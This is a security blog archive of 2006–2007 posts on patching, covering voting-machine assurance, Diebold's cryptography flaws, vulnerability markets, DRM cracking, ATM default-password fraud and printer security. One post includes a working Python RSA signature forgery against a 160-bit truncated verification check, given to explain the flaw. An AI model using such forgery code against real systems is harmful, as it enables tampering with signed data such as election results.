Entries Tagged "patching"


Assurance

Over the past several months, the state of California conducted the most comprehensive security review yet of electronic voting machines. People I consider to be security experts analyzed machines from three different manufacturers, performing both a red-team attack analysis and a detailed source code review. Serious flaws were discovered in all machines and, as a result, the machines were all decertified for use in California elections.

The reports are worth reading, as is much of the blog commentary on the topic. The reviewers were given an unrealistic timetable and had trouble getting needed documentation. The fact that major security vulnerabilities were found in all machines is a testament to how poorly they were designed, not to the thoroughness of the analysis. Yet California Secretary of State Debra Bowen has conditionally recertified the machines for use, as long as the makers fix the discovered vulnerabilities and adhere to a lengthy list of security requirements designed to limit future security breaches and failures.

While this is a good effort, it has security completely backward. It begins with a presumption of security: If there are no known vulnerabilities, the system must be secure. If there is a vulnerability, then once it’s fixed, the system is again secure. How anyone comes to this presumption is a mystery to me. Is there any version of any operating system anywhere where the last security bug was found and fixed? Is there a major piece of software anywhere that has been, and continues to be, vulnerability-free?

Yet again and again we react with surprise when a system has a vulnerability. Last weekend at the hacker convention DefCon, I saw new attacks against supervisory control and data acquisition (SCADA) systems—those are embedded control systems found in infrastructure systems like fuel pipelines and power transmission facilities—electronic badge-entry systems, MySpace, and the high-security locks used in places like the White House. I will guarantee you that the manufacturers of these systems all claimed they were secure, and that their customers believed them.

Earlier this month, the government disclosed that the computer system of the US-Visit border control system is full of security holes. Weaknesses existed in all control areas and computing device types reviewed, the report said. How exactly is this different from any large government database? I’m not surprised that the system is so insecure; I’m surprised that anyone is surprised.

We’ve been assured again and again that RFID passports are secure. When researcher Lukas Grunwald successfully cloned one last year at DefCon, we were told there was little risk. This year, Grunwald revealed that he could use a cloned passport chip to sabotage passport readers. Government officials are again downplaying the significance of this result, although Grunwald speculates that this or another similar vulnerability could be used to take over passport readers and force them to accept fraudulent passports. Anyone care to guess who’s more likely to be right?

It’s all backward. Insecurity is the norm. If any system—whether a voting machine, operating system, database, badge-entry system, RFID passport system, etc.—is ever built completely vulnerability-free, it’ll be the first time in the history of mankind. It’s not a good bet.

Once you stop thinking about security backward, you immediately understand why the current software security paradigm of patching doesn’t make us any more secure. If vulnerabilities are so common, finding a few doesn’t materially reduce the quantity remaining. A system with 100 patched vulnerabilities isn’t more secure than a system with 10, nor is it less secure. A patched buffer overflow doesn’t mean that there’s one less way attackers can get into your system; it means that your design process was so lousy that it permitted buffer overflows, and there are probably thousands more lurking in your code.
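To put rough numbers on that intuition, here is a back-of-the-envelope sketch in Python. The defect density is hypothetical, purely for illustration; the point is that any plausible density swamps the handful of fixes a patch cycle delivers.

    # All numbers hypothetical: with any plausible latent-vulnerability
    # density, patching the few bugs that get found barely changes how
    # many remain.
    lines_of_code = 1_000_000
    latent_per_kloc = 2.0                                  # assumed density
    latent = int(lines_of_code / 1000 * latent_per_kloc)   # 2,000 lurking
    for patched in (10, 100):
        print(f"{patched} patched, ~{latent - patched} still lurking")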

Diebold Election Systems has patched a certain vulnerability in its voting-machine software twice, and each patch contained another vulnerability. Don’t tell me it’s my job to find another vulnerability in the third patch; it’s Diebold’s job to convince me it has finally learned how to patch vulnerabilities properly.

Several years ago, former National Security Agency technical director Brian Snow began talking about the concept of “assurance” in security. Snow, who spent 35 years at the NSA building systems at security levels far higher than anything the commercial world deals with, told audiences that the agency couldn’t use modern commercial systems with their backward security thinking. Assurance was his antidote:

Assurances are confidence-building activities demonstrating that:

  1. The system’s security policy is internally consistent and reflects the requirements of the organization,
  2. There are sufficient security functions to support the security policy,
  3. The system functions to meet a desired set of properties and only those properties,
  4. The functions are implemented correctly, and
  5. The assurances hold up through the manufacturing, delivery and life cycle of the system.

Basically, demonstrate that your system is secure, because I’m just not going to believe you otherwise.

Assurance is less about developing new security techniques than about using the ones we have. It’s all the things described in books like Building Secure Software, Software Security and Writing Secure Code. It’s some of what Microsoft is trying to do with its Security Development Lifecycle (SDL). It’s the Department of Homeland Security’s Build Security In program. It’s what every aircraft manufacturer goes through before it puts a piece of software in a critical role on an aircraft. It’s what the NSA demands before it purchases a piece of security equipment. As an industry, we know how to provide security assurance in software and systems; we just tend not to bother.

And most of the time, we don’t care. Commercial software, as insecure as it is, is good enough for most purposes. And while backward security is more expensive over the life cycle of the software, it’s cheaper where it counts: at the beginning. Most software companies are short-term smart to ignore the cost of never-ending patching, even though it’s long-term dumb.

Assurance is expensive, in terms of money and time for both the process and the documentation. But the NSA needs assurance for critical military systems; Boeing needs it for its avionics. And the government needs it more and more: for voting machines, for databases entrusted with our personal information, for electronic passports, for communications systems, for the computers and systems controlling our critical infrastructure. Assurance requirements should be common in IT contracts, not rare. It’s time we stopped thinking backward and pretending that computers are secure until proven otherwise.

This essay originally appeared on Wired.com.

Posted on August 9, 2007 at 8:19 AM

Florida E-Voting Study

Florida just released another study of the Diebold voting machines. The reviewers—real security researchers, as in the California study, not posers—examined v4.6.5 of the Diebold TSx and v1.96.8 of the Diebold Optical Scan. (California studied older versions: v4.6.4 of the TSx and v1.96.6 of the Optical Scan.)

The most interesting issues are (1) Diebold’s apparent “find-then-patch” approach to computer security, and (2) Diebold’s lousy use of cryptography.

Among the findings:

  • Section 3.5. They use RSA signatures, apparently to address previously documented flaws in the literature. But their signature verification step has a problem: it computes H = signature**3 mod N, and then compares only 160 bits of H with the SHA-1 hash of the message. This is a natural way to implement RSA signatures if you just read a security textbook. But this approach is insecure—the report demonstrates a 250-line Java program that forges RSA signatures over (basically) arbitrary messages of the attacker’s choosing (see the sketch after this list).
  • Section 3.10.3. The original Hopkins report talked about the lack of crypto for network (or dialup) communications between a TSx voting machine and the back-end GEMS server. Apparently, Diebold tried to use SSL to fix the problem. The RABA report analyzed Diebold’s SSL usage and found a security problem. Diebold then tried to patch its SSL implementation. This new report looks at the patched version and finds that it is still vulnerable to a man-in-the-middle attack (see the sketch below).
  • Section 3.7.1.1. Key management. Avi Rubin has already summarized some of the highlights.

    This is arguably worse than having a fixed static key in all of the machines. Because with knowledge of the machine’s serial number, anyone can calculate all of the secret keys. Whereas before, someone would have needed access to the source code or the binary in the machine.

    Other attacks mentioned in the report include swapping two candidate vote counters and many other vote switching attacks. The supervisor PIN is protected with weak cryptography, and once again Diebold has shown that they do not have even a basic understanding of how to apply cryptographic mechanisms.
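To make the textbook mistake concrete, here is a minimal Python sketch of the low-exponent forgery. It assumes the verifier compares the low-order 160 bits of signature**3 mod N against the SHA-1 hash and that N is 1024 bits; the report’s actual 250-line Java attack may differ in its details.

    import hashlib  # Python 3.8+ (for pow with a negative exponent)

    def make_odd_message(base: bytes) -> bytes:
        # Append a counter until the SHA-1 value is odd; the cube-root
        # trick below works only for odd residues.
        i = 0
        while True:
            m = base + b" #" + str(i).encode()
            if hashlib.sha1(m).digest()[-1] & 1:
                return m
            i += 1

    def forge_signature(message: bytes) -> int:
        h = int.from_bytes(hashlib.sha1(message).digest(), "big")
        # Odd residues mod 2**160 form a group of exponent 2**158, so
        # cubing is invertible there: d acts as a "cube root" exponent.
        d = pow(3, -1, 2 ** 158)
        s = pow(h, d, 2 ** 160)        # s**3 ≡ h (mod 2**160)
        # s < 2**160 means s**3 < 2**480 < N for a 1024-bit N, so no
        # mod-N reduction occurs and the low 160 bits of s**3 are h.
        return s

    def flawed_verify(sig: int, message: bytes, n: int) -> bool:
        h = int.from_bytes(hashlib.sha1(message).digest(), "big")
        return pow(sig, 3, n) % 2 ** 160 == h  # compares only 160 bits!

    n = 2 ** 1023 + 3   # stand-in for a 1024-bit modulus; any will do
    msg = make_odd_message(b"candidate A: 9999 votes, candidate B: 0")
    assert flawed_verify(forge_signature(msg), msg, n)

A correct verifier checks the entire padded value of H (for example, a full PKCS#1 v1.5 padding check), which removes the attacker’s freedom in the unchecked bits.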

Avi Rubin has a nice overall summary, too:

So, Diebold is doing some things better than they did before when they had absolutely no security, but they have yet to do them right. Anyone taking any of our cryptography classes at Johns Hopkins, for example, would do a better job applying cryptography. If you read the SAIT report, this theme repeats throughout.

Right. These are classic examples of problems that can arise if (1) you “roll your own” crypto and/or (2) employ “find and patch” rather than a principled approach to security.
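On the SSL point specifically, resisting a man-in-the-middle is not exotic; the ingredient Diebold’s patches kept missing is peer authentication. Here is a minimal Python sketch with hypothetical hostnames and certificate files; it illustrates the general pattern, not Diebold’s actual protocol.

    import socket
    import ssl

    # The vulnerable pattern: traffic is encrypted, but the client accepts
    # whatever certificate the far end presents, so an attacker in the
    # middle can terminate the connection with his own key and relay it.
    weak = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    weak.check_hostname = False
    weak.verify_mode = ssl.CERT_NONE

    # The fix: authenticate the peer against a CA you control.
    def upload_results(host: str = "gems.example.org", port: int = 4443) -> None:
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # verification on by default
        ctx.load_verify_locations("election_ca.pem")   # hypothetical pinned CA
        with socket.create_connection((host, port)) as raw:
            with ctx.wrap_socket(raw, server_hostname=host) as tls:
                tls.sendall(b"polls closed: uploading results")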

It all makes me wonder what new problems will arise from future security patches.

The good news is that Florida has decided not to certify the TSX at this time. They may try to certify a revised version of the OS (optical scan) system.

Posted on August 6, 2007 at 6:34 AM

Business Models for Discovering Security Vulnerabilities

One company sells them to the vendors:

Legerov, the founder of a small Moscow security company, Gleg, scrutinizes computer code in commonly used software for programming bugs, which attackers can use to break into computer systems, and sends his findings to a few dozen corporate customers around the world. Each customer pays more than $10,000 for information it can use to plug the hidden holes in its computers and stay ahead of criminal hackers.

iDefense buys them:

This month, iDefense, a Virginia-based subsidiary of the technology company VeriSign, began offering an $8,000 bounty to the first six researchers to find holes in Vista or the newest version of Internet Explorer, and up to $4,000 more for code that can take advantage of the weaknesses. Like Gleg, iDefense will sell information about those vulnerabilities to companies and government agencies for an undisclosed amount, though iDefense makes it a practice to alert vendors like Microsoft first.

So do criminals:

But the iDefense rewards are low compared to bounties offered on the black market. In December, the Japanese antivirus company Trend Micro found a Vista vulnerability being offered by an anonymous hacker on a Romanian Web forum for $50,000.

There’s a lot of FUD in this article, but also some good stuff.

Posted on February 5, 2007 at 12:44 PM

Firefox JavaScript Flaw: Real or Hoax?

Two hackers—Mischa Spiegelmock and Andrew Wbeelsoi—have announced a flaw in Firefox’s JavaScript:

An attacker could commandeer a computer running the browser simply by crafting a Web page that contains some malicious JavaScript code, Mischa Spiegelmock and Andrew Wbeelsoi said in a presentation at the ToorCon hacker conference here. The flaw affects Firefox on Windows, Apple Computer’s Mac OS X and Linux, they said.

More interesting was this piece:

The hackers claim they know of about 30 unpatched Firefox flaws. They don’t plan to disclose them, instead holding onto the bugs.

Jesse Ruderman, a Mozilla security staffer, attended the presentation and was called up on the stage with the two hackers. He attempted to persuade the presenters to responsibly disclose flaws via Mozilla’s bug bounty program instead of using them for malicious purposes such as creating networks of hijacked PCs, called botnets.

“I do hope you guys change your minds and decide to report the holes to us and take away $500 per vulnerability instead of using them for botnets,” Ruderman said.

The two hackers laughed off the comment. “It is a double-edged sword, but what we’re doing is really for the greater good of the Internet. We’re setting up communication networks for black hats,” Wbeelsoi said.

Sounds pretty bad? But maybe it’s all a hoax:

Spiegelmock, a developer at Six Apart, a blog software company in San Francisco, now says the ToorCon talk was meant “to be humorous” and insists the code presented at the conference cannot result in code execution.

Spiegelmock’s strange about-face comes as Mozilla’s security response team is racing to piece together information from the ToorCon talk to figure out how to fix the issue.

[…]

On the claim that there are 30 undisclosed Firefox vulnerabilities, Spiegelmock pinned that entirely on co-presenter Wbeelsoi. “I have no undisclosed Firefox vulnerabilities. The person who was speaking with me made this claim, and I honestly have no idea if he has them or not. I apologize to everyone involved, and I hope I have made everything as clear as possible,” Spiegelmock added.

I vote: hoax, with maybe some seeds of real.

Posted on October 4, 2006 at 7:04 AM

FairUse4WM News

A couple of weeks ago I wrote about the battle between Microsoft’s DRM system and FairUse4WM, which breaks it. The news for this week is that Microsoft has patched their security against FairUse4WM 1.2 and filed a lawsuit against the program’s anonymous authors, and those same anonymous authors have released FairUse4WM 1.3, which breaks the latest Microsoft patch.

We asked Viodentia about Redmond’s accusation that he and/or his associates broke into its systems in order to obtain the IP necessary to crack PlaysForSure; Vio replied that he’s “utterly shocked” by the charge. “I didn’t use any Microsoft source code. However, I believe that this lawsuit is a fishing expedition to get identity information, which can then be used to either bring more targeted lawsuits, or to cause other trouble.” We’re sure Microsoft would like its partners and the public to think that its DRM is generally infallible and could only be cracked by stealing its IP, so Viodentia’s conclusion about its legal tactics seems pretty fair, obvious, and logical to us.

What’s interesting about this continuing saga is how different it is from the normal find-vulnerability-then-patch sequence. The authors of FairUse4WM aren’t finding bugs and figuring out how to exploit them, forcing Microsoft to patch them. This is a sequence of crack, fix, re-crack, re-fix, etc.

The reason we’re seeing this—and this is going to be the norm for DRM systems—is that DRM is fundamentally an impossible problem. Making it work at all involves tricks, and breaking DRM is akin to “fixing” the software so the tricks don’t work. Anyone looking for a demonstration that technical DRM is doomed should watch this story unfold. (If Microsoft has any chance of winning at all, it’s via the legal route.)

Posted on September 28, 2006 at 12:55 PM

Programming ATMs to Believe $20 Bills Are $5 Bills

Clever attack:

Last month, a man reprogrammed an automated teller machine at a gas station on Lynnhaven Parkway to spit out four times as much money as it should.

He then made off with an undisclosed amount of cash.

No one noticed until nine days later, when a customer told the clerk at a Crown gas station that the machine was disbursing more money than it should. Police are now investigating the incident as fraud.

Police spokeswoman Rene Ball said the first withdrawal occurred at 6:17 p.m. Aug. 19. Surveillance footage documented a man about 5-foot-8 with a thin build walking into the gas station on the 2400 block of Lynnhaven Parkway and swiping an ATM card.

The man then punched a series of numbers on the machine’s keypad, breaking the security code. The ATM was programmed to disburse $20 bills. The man reprogrammed the machine so it recorded each $20 bill as a $5 debit to his account.

The suspect returned to the gas station a short time later and took more money, but authorities did not say how much. Because the account was pre-paid and the card could be purchased at several places, police are not sure who is behind the theft.
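The arithmetic behind “four times as much money” is simple once you realize the bill denomination is just a setting. A toy sketch in Python, with made-up parameter names:

    def cash_dispensed(amount_requested: int, configured_denom: int,
                       actual_denom: int) -> int:
        # Bills the ATM counts out at the value it *thinks* they have,
        # versus what is actually loaded in the cassette.
        bills = amount_requested // configured_denom
        return bills * actual_denom

    # Cassette holds $20 bills; machine reprogrammed to believe they are $5.
    # A $100 withdrawal debits the account $100 but pays out 20 bills:
    print(cash_dispensed(100, configured_denom=5, actual_denom=20))  # 400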

What’s weird is that it seems that this is easy. The ATM is a Tranax Mini Bank 1500. And you can buy the manuals from the Tranax website. And they’re useful for this sort of thing:

I am holding in my hands a legitimately obtained copy of the manual. There are a lot of security sensitive things inside of this manual. As promised, I am not going to reveal them, but there are:

  • Instructions on how to enter the diagnostic mode
  • Default passwords

  • Default Combinations For the Safe

Do not ask me for them. If you maintain one of these devices, make sure that you are not using the default password. If you are, change it immediately.

This is from an eWeek article:

“If you get your hand on this manual, you can basically reconfigure the ATM if the default password was not changed. My guess is that most of these mini-bank terminals are sitting around with default passwords untouched,” Goldsmith said.

Officials at Tranax did not respond to eWEEK requests for comment. According to a note on the company’s Web site, Tranax has shipped 70,000 ATMs, self-service terminals and transactional kiosks around the country. The majority of those shipments are of the flagship Mini-Bank 1500 machine that was rigged in the Virginia Beach heist.

So, as long as you can use an account that’s not traceable back to you, and you disguise yourself for the ATM cameras, this is a pretty easy crime.

eWeek claims you can get a copy of the manual simply by Googling for it. (Here’s one on eBay.)

And Tranax is promising a fix that will force operators to change the default passwords. But honestly, what’s the likelihood that someone who can’t be bothered to change the default password will take the time to install a software patch?

EDITED TO ADD (9/22): Here’s the manual.

Posted on September 22, 2006 at 7:04 AM

Microsoft and FairUse4WM

If you really want to see Microsoft scramble to patch a hole in its software, don’t look to vulnerabilities that impact countless Internet Explorer users or give intruders control of thousands of Windows machines. Just crack Redmond’s DRM.

Security patches used to be rare. Software vendors were happy to pretend that vulnerabilities in their products were illusory—and then quietly fix the problem in the next software release.

That changed with the full disclosure movement. Independent security researchers started going public with the holes they found, making vulnerabilities impossible for vendors to ignore. Then worms became more common; patching—and patching quickly—became the norm.

But even now, no software vendor likes to issue patches. Every patch is a public admission that the company made a mistake. Moreover, the process diverts engineering resources from new development. Patches annoy users by making them update their software, and piss them off even more if the update doesn’t work properly.

For the vendor, there’s an economic balancing act: how much more will your users be annoyed by unpatched software than they will be by the patch, and is that reduction in annoyance worth the cost of patching?

Since 2003, Microsoft’s strategy to balance these costs and benefits has been to batch patches: instead of issuing them one at a time, it’s been issuing them all together on the second Tuesday of each month. This decreases Microsoft’s development costs and increases the reliability of its patches.

The user pays for this strategy by remaining open to known vulnerabilities for up to a month. On the other hand, users benefit from a predictable schedule: Microsoft can test all the patches that are going out at the same time, which means that patches are more reliable and users are able to install them faster with more confidence.
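A toy model makes the balancing act explicit. Every number below is invented purely for illustration; the shape of the result, not the figures, is the point.

    # Hypothetical monthly cost to the vendor of shipping patches in
    # batches versus one at a time.
    VULNS_PER_MONTH = 8
    RELEASE_COST = 250_000    # engineering/QA/distribution per release (assumed)
    ANNOYANCE_COST = 40_000   # goodwill cost per forced update (assumed)
    EXPOSURE_PER_VULN_DAY = 100  # tiny: users, not the vendor, bear the risk

    def vendor_monthly_cost(releases_per_month: int) -> float:
        # A fix waits, on average, half a release window before shipping.
        avg_exposed_days = 30 / releases_per_month / 2
        exposure = VULNS_PER_MONTH * avg_exposed_days * EXPOSURE_PER_VULN_DAY
        return releases_per_month * (RELEASE_COST + ANNOYANCE_COST) + exposure

    print(vendor_monthly_cost(1))  # one batched release:   ~302,000
    print(vendor_monthly_cost(8))  # every fix immediately: ~2,321,500

Because the vendor internalizes almost none of its users’ exposure, that term is negligible and batching wins by nearly an order of magnitude.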

In the absence of regulation, software liability, or some other mechanism to make unpatched software costly for the vendor, “Patch Tuesday” is the best users are likely to get.

Why? Because it makes near-term financial sense to Microsoft. The company is not a public charity, and if the internet suffers, or if computers are compromised en masse, the economic impact on Microsoft is still minimal.

Microsoft is in the business of making money, and keeping users secure by patching its software is only incidental to that goal.

There’s no better example of this principle in action than Microsoft’s behavior around the vulnerability in its digital rights management software PlaysForSure.

Last week, a hacker developed an application called FairUse4WM that strips the copy protection from Windows Media DRM 10 and 11 files.

Now, this isn’t a “vulnerability” in the normal sense of the word: digital rights management is not a feature that users want. Being able to remove copy protection is a good thing for some users, and completely irrelevant for everyone else. No user is ever going to say: “Oh no. I can now play the music I bought for my computer in my car. I must install a patch so I can’t do that anymore.”

But to Microsoft, this vulnerability is a big deal. It affects the company’s relationship with major record labels. It affects the company’s product offerings. It affects the company’s bottom line. Fixing this “vulnerability” is in the company’s best interest; never mind the customer.

So Microsoft wasted no time; it issued a patch three days after learning about the hack. There’s no month-long wait for copyright holders who rely on Microsoft’s DRM.

This clearly demonstrates that economics is a much more powerful motivator than security.

It should surprise no one that the system didn’t stay patched for long. FairUse4WM 1.2 gets around Microsoft’s patch, and also circumvents the copy protection in Windows Media DRM 9 and 11 beta 2 files.

That was Saturday. Any guess on how long it will take Microsoft to patch Media Player once again? And then how long before the FairUse4WM people update their own software?

Certainly much less time than it will take Microsoft and the recording industry to realize they’re playing a losing game, and that trying to make digital files uncopyable is like trying to make water not wet.

If Microsoft abandoned this Sisyphean effort and put the same development effort into building a fast and reliable patching system, the entire internet would benefit. But simple economics says it probably never will.

This essay originally appeared on Wired.com.

EDITED TO ADD (9/8): Commentary.

EDITED TO ADD (9/9): Microsoft released a patch for FairUse4WM 1.2 on Thursday, September 7th.

EDITED TO ADD (9/13): BSkyB halts download service because of the breaks.

EDITED TO ADD (9/16): Microsoft is threatening legal action against people hosting copies of FairUse4WM.

Posted on September 7, 2006 at 8:33 AM

Faux Disclosure

Good essay on “faux disclosure”: disclosing a vulnerability without really disclosing it.

You’ve probably heard of full disclosure, the security philosophy that calls for making public all details of vulnerabilities. It has been the subject of debates among researchers, vendors, and security firms. But the story that grabbed most of the headlines at the Black Hat Briefings in Las Vegas last week was based on a different type of disclosure. For lack of a better name, I’ll call it faux disclosure. Here’s why.

Security researchers Dave Maynor of ISS and Johnny Cache—a.k.a. Jon Ellch—demonstrated an exploit that allowed them to install a rootkit on an Apple laptop in less than a minute. Well, sort of; they showed a video of it, and also noted that they’d used a third-party Wi-Fi card in the demo of the exploit, rather than the MacBook’s internal Wi-Fi card. But they said that the exploit would work whether the third-party card—which they declined to identify—was inserted in a Mac, Windows, or Linux laptop.

[…]

How is that for murky and non-transparent? The whole world is at risk—if the exploit is real—whenever the unidentified card is used. But they won’t say which card, although many sources presume the card is based on the Atheros chipset, which Apple employs.

It gets worse. Brian Krebs of the Washington Post, who first reported on the exploit, updated his original story and has reported that Maynor said, “Apple had leaned on Maynor and Ellch pretty hard not to make this an issue about the Mac drivers—mainly because Apple had not fixed the problem yet.”

That’s part of what is meant by full disclosure these days—giving the vendor a chance to fix the vulnerability before letting the whole world know about it. That way, the thinking goes, the only people who get hurt by it are the people who get exploited by it. But damage to the responsible vendor’s image is mitigated somewhat, and many in the security business seem to think that damage control is more important than anything that might happen to any of the vendor’s customers.

Big deal. Publicly traded corporations like Apple and Microsoft and all the rest have been known to ignore ethics, morality, any consideration of right or wrong, or anything at all that might divert them from their ultimate goal: to maximize profits. Because of this, some corporations only speak the truth when it is in their best interest. Otherwise, they lie or maintain silence.

Full disclosure is the only thing that forces vendors to fix security problems. The further we move away from full disclosure, the less incentive vendors have to fix problems and the more at-risk we all are.

Posted on August 14, 2006 at 1:41 PM

Printer Security

At BlackHat last week, Brendan O’Connor warned about the dangers of insecure printers:

“Stop treating them as printers. Treat them as servers, as workstations,” O’Connor said in his presentation on Thursday. Printers should be part of a company’s patch program and be carefully managed, not forgotten by IT and handled by the most junior person on staff, he said.

I remember the L0pht doing work on printer vulnerabilities, and ways to attack networks via the printers, years ago. But the point is still valid and bears repeating: printers are computers, and have vulnerabilities like any other computers.

Once a printer was under his control, O’Connor said he would be able to use it to map an organization’s internal network—a situation that could help stage further attacks. The breach gave him access to any of the information printed, copied or faxed from the device. He could also change the internal job counter—which can reduce, or increase, a company’s bill if the device is leased, he said.

The printer break-in also enables a number of practical jokes, such as sending print and scan jobs to arbitrary workers’ desktops, O’Connor said. Also, devices could be programmed to include, for example, an image of a paper clip on every print, fax or copy, ultimately driving office staffers to take the machine apart looking for the paper clip.

Getting copies of all printed documents is definitely a security vulnerability, but I think the biggest threat is that the printers are inside the network, and are a more-trusted launching pad for onward attacks.

One of the weaknesses in the Xerox system is an unsecured boot loader, the technology that loads the basic software on the device, O’Connor said. Other flaws lie in the device’s Web interface and in the availability of services such as the Simple Network Management Protocol and Telnet, he said.

O’Connor informed Xerox of the problems in January. The company did issue a fix for its WorkCentre 200 series, it said in a statement. “Thanks to Brendan’s efforts, we were able to post a patch for our customers in mid-January which fixes the issues,” a Xerox representative said in an e-mailed statement.

One of the reasons this is a particularly nasty problem is that people don’t update their printer software. Want to bet approximately 0% of the printer’s users installed that patch? And what about printers whose code can’t be patched?

EDITED TO ADD (8/7): O’Connor’s name corrected.

Posted on August 7, 2006 at 10:59 AM
